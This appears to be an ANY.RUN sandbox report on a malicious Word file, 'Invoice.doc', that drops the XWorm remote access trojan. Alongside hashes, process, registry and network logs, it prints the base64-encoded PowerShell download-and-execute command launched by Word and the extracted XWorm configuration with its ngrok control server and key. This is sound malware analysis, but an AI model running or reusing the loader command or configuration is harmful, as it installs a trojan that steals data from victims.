Malware analysis Invoice.doc Malicious activity | ANY.RUN

Add for printing

File name:	Invoice.doc
Full analysis:	https://app.any.run/tasks/315071cd-9cfd-4786-b905-369a0de0e9a1
Verdict:	Malicious activity
Threats:	XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. XWorm ist ein Remote Access Trojaner (RAT), der als Malware-as-a-Service verkauft wird. Er verfügt über ein umfangreiches Hacking-Toolset und ist in der Lage, private Informationen und Dateien auf dem infizierten Computer zu sammeln, MetaMask- und Telegram-Konten zu kapern und Benutzeraktivitäten zu verfolgen. XWorm wird in der Regel durch mehrstufige Angriffe auf die Computer der Opfer übertragen, die mit Phishing-E-Mails beginnen. Malware Trends Tracker >>>
Analysis date:	July 13, 2024, 10:59:00
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	remote xworm
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1200, Author: Tiago Ol, Number of Characters: 0, Create Time/Date: Tue Feb 28 04:44:00 2023, Last Saved By: Tiago Ol, Last Saved Time/Date: Tue Feb 28 05:12:00 2023, Name of Creating Application: Microsoft O, Number of Pages: 1, Revision Number: 4, Security: 0, Template: Normal, Number of Words: 0
MD5:	2A2B8A8FAEBBF33BBFE15386C468B9E0
SHA1:	0E1EC390F4537426C855D2402565E9A594588959
SHA256:	E879EE37EE3D89D808448A1D529878D958BE6F46F5B30B5F59AA1F7B5B955F30
SSDEEP:	192:yyEYvYEu9JM/tPonsY+2SuEZVRGYxg0amxTn7NXmU0nBVwpKCpneRUxhllILWJ7V:5sJO1Y+2JmVRGAg6bhmUARahj2WJkG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Microsoft Office executes commands via PowerShell or Cmd
  - WINWORD.EXE (PID: 1116)
- Starts POWERSHELL.EXE for commands execution
  - WINWORD.EXE (PID: 1116)
- Unusual execution from MS Office
  - WINWORD.EXE (PID: 1116)
- Downloads the requested resource (POWERSHELL)
  - powershell.exe (PID: 2328)
- Dynamically loads an assembly (POWERSHELL)
  - powershell.exe (PID: 2328)
- XWORM has been detected (SURICATA)
  - RegSvcs.exe (PID: 3128)
- XWORM has been detected (YARA)
  - RegSvcs.exe (PID: 3128)
- Connects to the CnC server
  - RegSvcs.exe (PID: 3128)
SUSPICIOUS
- Runs shell command (SCRIPT)
  - WINWORD.EXE (PID: 1116)
- BASE64 encoded PowerShell command has been detected
  - WINWORD.EXE (PID: 1116)
- Base64-obfuscated command line is found
  - WINWORD.EXE (PID: 1116)
- Connects to unusual port
  - RegSvcs.exe (PID: 3128)
- Reads security settings of Internet Explorer
  - RegSvcs.exe (PID: 3128)
- Contacting a server suspected of hosting an CnC
  - RegSvcs.exe (PID: 3128)
- Application launched itself
  - RegSvcs.exe (PID: 3128)
- Reads the date of Windows installation
  - RegSvcs.exe (PID: 3128)
INFO
- Disables trace logs
  - powershell.exe (PID: 2328)
- Checks proxy server information
  - powershell.exe (PID: 2328)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 2328)
- Checks supported languages
  - RegSvcs.exe (PID: 3128)
  - RegSvcs.exe (PID: 7088)
- Reads the computer name
  - RegSvcs.exe (PID: 3128)
  - RegSvcs.exe (PID: 7088)
- Reads the machine GUID from the registry
  - RegSvcs.exe (PID: 3128)
- Process checks computer location settings
  - RegSvcs.exe (PID: 3128)
- Reads the software policy settings
  - slui.exe (PID: 3840)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

XWorm

(PID) Process(3128) RegSvcs.exe

C25.tcp.eu.ngrok.io:14204

Keys

AES<123456789>

Options

Splitter<Xwormmm>

Sleep time3

USB drop nameUSB.exe

Mutexy6q4vfceWiccrwBd

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen:	36
CompObjUserType:	Documento do Microsoft Word 97-2003
Identification:	Word 8.0
LanguageCode:	English (US)
DocFlags:	Has picture, 1Table, ExtChar
System:	Windows
Word97:	No
Author:	Tiago Oliveira
Comments:	-
CreateDate:	2023:03:31 04:44:00
Keywords:	-
LastModifiedBy:	Tiago Oliveira
ModifyDate:	2023:03:31 05:12:00
Software:	Microsoft Office Word
Security:	None
Subject:	-
Template:	Normal.dotm
Title:	-
CodePage:	Unicode UTF-16, little endian
ScaleCrop:	No
CharCountWithSpaces:	-
Company:	-
HeadingPairs:	Título
LinksUpToDate:	No
TitleOfParts:	-
AppVersion:	16
LastPrinted:	0000:00:00 00:00:00
RevisionNumber:	4
TotalEditTime:	-
Words:	-
Characters:	-
Pages:	1
Paragraphs:	-
Lines:	1

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

151

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

1116

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\AppData\Local\Temp\Invoice.doc /o ""

C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft Word

Version:

16.0.16026.20146

Modules

Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll

1272

C:\WINDOWS\System32\slui.exe -Embedding

C:\Windows\System32\slui.exe

—

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Activation Client

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

2176

C:\WINDOWS\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\SppExtComObj.Exe

—

svchost.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

KMS Connection Broker

Version:

10.0.19041.3996 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll

2328

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8ANgA0ADgAYwAyAGYAZQA4AGQAMgAxADAAMgA3ADgAZQA4ADAAMQA5ADEAYQAzAGQAOQA2ADkANwA4ADYAOAA0ADkANQAwADQANwAwADQANwA0AGEALwBlAGMAZQA4AGMANQA2ADcAYwAzADQAMAAxADAANwAyADUAZABlADcAYgAyADgANgAxADgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WINWORD.EXE

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3128

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft .NET Services Installation Utility

Exit code:

Version:

4.8.9037.0 built by: NET481REL1

Modules

Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll

XWorm

(PID) Process(3128) RegSvcs.exe

C25.tcp.eu.ngrok.io:14204

Keys

AES<123456789>

Options

Splitter<Xwormmm>

Sleep time3

USB drop nameUSB.exe

Mutexy6q4vfceWiccrwBd

3840

"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent

C:\Windows\System32\slui.exe

SppExtComObj.Exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows Activation Client

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

5776

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

7084

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

RegSvcs.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

7088

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

—

RegSvcs.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft .NET Services Installation Utility

Exit code:

Version:

4.8.9037.0 built by: NET481REL1

Modules

Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll

Add for printing

Total events

19 675

Read events

19 409

Write events

258

Delete events

Modification events


(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:	write	Name:	0
Value: 017012000000001000B24E9A3E01000000000000000500000000000000
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:	delete value	Name:	0
Value: ซ괐殺ࠆꯞꝅ莼跳⏺䘅헉꾍樁င$梅摝麨ީ湕湫睯쥮௅賙ᒳ೅肫
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\1116
Operation:	write	Name:	0
Value: 0B0E109D5707883B160744BFC7990DE7824991230046809FE6F4BAA2B5ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511DC08D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	en-US
Value: 2
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources
Operation:	write	Name:	UISnapshotLanguages
Value: de-de;en-us;es-es;fr-fr;it-it;ja-jp;ko-kr;pt-br;ru-ru;tr-tr
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	en-US
Value: 1
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	de-de
Value: 1
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	es-es
Value: 1
(PID) Process:	(1116) WINWORD.EXE	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:	write	Name:	fr-fr
Value: 1

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
1116	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin		text
		MD5:D2E982434D56A0709B9B9FE1F2909145	SHA256:9CB4420ED2872E6DE694A9C6D3D010138B2BB11B2A05614317C1F3C5190D9A46
1116	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres		binary
		MD5:1E9602DD2DE1C522F45A7C1E8A713BE9	SHA256:C8020EB378E67C088B1E459F06EDAE78AF0A2B50766825D66A2D0FC26B934697
1116	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres		binary
		MD5:E8625A56CCE459E7C49F76E8306821DA	SHA256:19068DB5037FB7AD2EB67779774EDF1F01EAA36D23DDEA492699CC772055BBAA
1116	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$nvoice.doc		binary
		MD5:CC3EB9A34178E20C84F5FC4047D60014	SHA256:53DDCD23B4CB08FB802692986EEE670D11C50A341FF1D4E3C41CB2DE9F8BED8C
1116	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres		binary
		MD5:7858BC85F011B9E193F83C2C89B16858	SHA256:2F6D5366E67D4B5FF781B097F4DDD33C5B60983205DD91E85B9CDFC36FF8729F
2328	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\71BF9Z2FC46P5EDQO147.temp		binary
		MD5:14F5C9A26A250F0BF98AA8D5D97A42C0	SHA256:39B8F7985D04635CB146E06D459B8A5CFC7B48DD47495F7FC644F387CD48906A
1116	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		binary
		MD5:E96CA842C32F66150C830F76EDD59E55	SHA256:382EA0C041B861F9DBD1C614FFEDA8F1C96B424F9782B58EEF5FF03F5C0F1E46
1116	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DC97D266-264E-4FEC-A58F-11D0DC9F7E18		xml
		MD5:C29E45CDA469FF73CF7620EEB0829FA6	SHA256:A9B13B9BF89513F6088D46A8723E9D399BB6699CCCE8A36D387E2BB3D7243581
2328	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u2f0jbeg.ykw.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2328	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:477812A1AEE1F210EECD5F1A96E01420	SHA256:E38AAA2F2C4A4FEFABC208895492D9D5384EC4749DF16C61C8CD75B5666B902F

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4392	svchost.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4392	svchost.exe	GET	200	23.48.23.143:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
6064	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6784	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6784	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
4944	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
4264	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
2824	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
4656	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
3040	OfficeClickToRun.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4032	svchost.exe	239.255.255.250:1900	—	—	—	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
4392	svchost.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
1272	RUXIMICS.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4448	MoUsoCoreWorker.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
1116	WINWORD.EXE	52.109.28.46:443	officeclient.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	GB	unknown
1116	WINWORD.EXE	52.113.194.132:443	ecs.office.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	unknown
1116	WINWORD.EXE	23.48.23.66:443	omex.cdn.office.net	Akamai International B.V.	DE	unknown
4392	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	51.124.78.146 4.231.128.59 20.73.194.208	whitelisted
google.com	142.250.186.46	whitelisted
officeclient.microsoft.com	52.109.28.46	whitelisted
ecs.office.com	52.113.194.132	whitelisted
omex.cdn.office.net	23.48.23.66 23.48.23.18 23.48.23.42	whitelisted
crl.microsoft.com	23.48.23.143 23.48.23.156	whitelisted
www.microsoft.com	184.30.21.171	whitelisted
eternal.lol	104.21.85.27 172.67.201.57	unknown
www.bing.com	104.126.37.146 104.126.37.160 104.126.37.163 104.126.37.144 104.126.37.186 104.126.37.153 104.126.37.162 104.126.37.128 104.126.37.137 204.79.197.200 13.107.21.200	whitelisted
login.live.com	20.190.159.71 20.190.159.0 20.190.159.75 20.190.159.4 20.190.159.23 40.126.31.67 20.190.159.73 20.190.159.68	whitelisted

Threats

PID	Process	Class	Message
2168	svchost.exe	Misc activity	ET INFO DNS Query to a *.ngrok domain (ngrok.io)
3128	RegSvcs.exe	Malware Command and Control Activity Detected	REMOTE [ANY.RUN] Xworm TCP Initial Packet

8 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

Invoice.doc

2A2B8A8FAEBBF33BBFE15386C468B9E0

0E1EC390F4537426C855D2402565E9A594588959

E879EE37EE3D89D808448A1D529878D958BE6F46F5B30B5F59AA1F7B5B955F30

192:yyEYvYEu9JM/tPonsY+2SuEZVRGYxg0amxTn7NXmU0nBVwpKCpneRUxhllILWJ7V:5sJO1Y+2JmVRGAg6bhmUARahj2WJkG

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Microsoft Office executes commands via PowerShell or Cmd

Starts POWERSHELL.EXE for commands execution

Unusual execution from MS Office

Downloads the requested resource (POWERSHELL)

Dynamically loads an assembly (POWERSHELL)

XWORM has been detected (SURICATA)

XWORM has been detected (YARA)

Connects to the CnC server

SUSPICIOUS

Runs shell command (SCRIPT)

BASE64 encoded PowerShell command has been detected

Base64-obfuscated command line is found

Connects to unusual port

Reads security settings of Internet Explorer

Contacting a server suspected of hosting an CnC

Application launched itself

Reads the date of Windows installation

INFO

Disables trace logs

Checks proxy server information

Script raised an exception (POWERSHELL)

Checks supported languages

Reads the computer name

Reads the machine GUID from the registry

Process checks computer location settings

Reads the software policy settings

Malware configuration

XWorm

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Malware configuration

XWorm

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings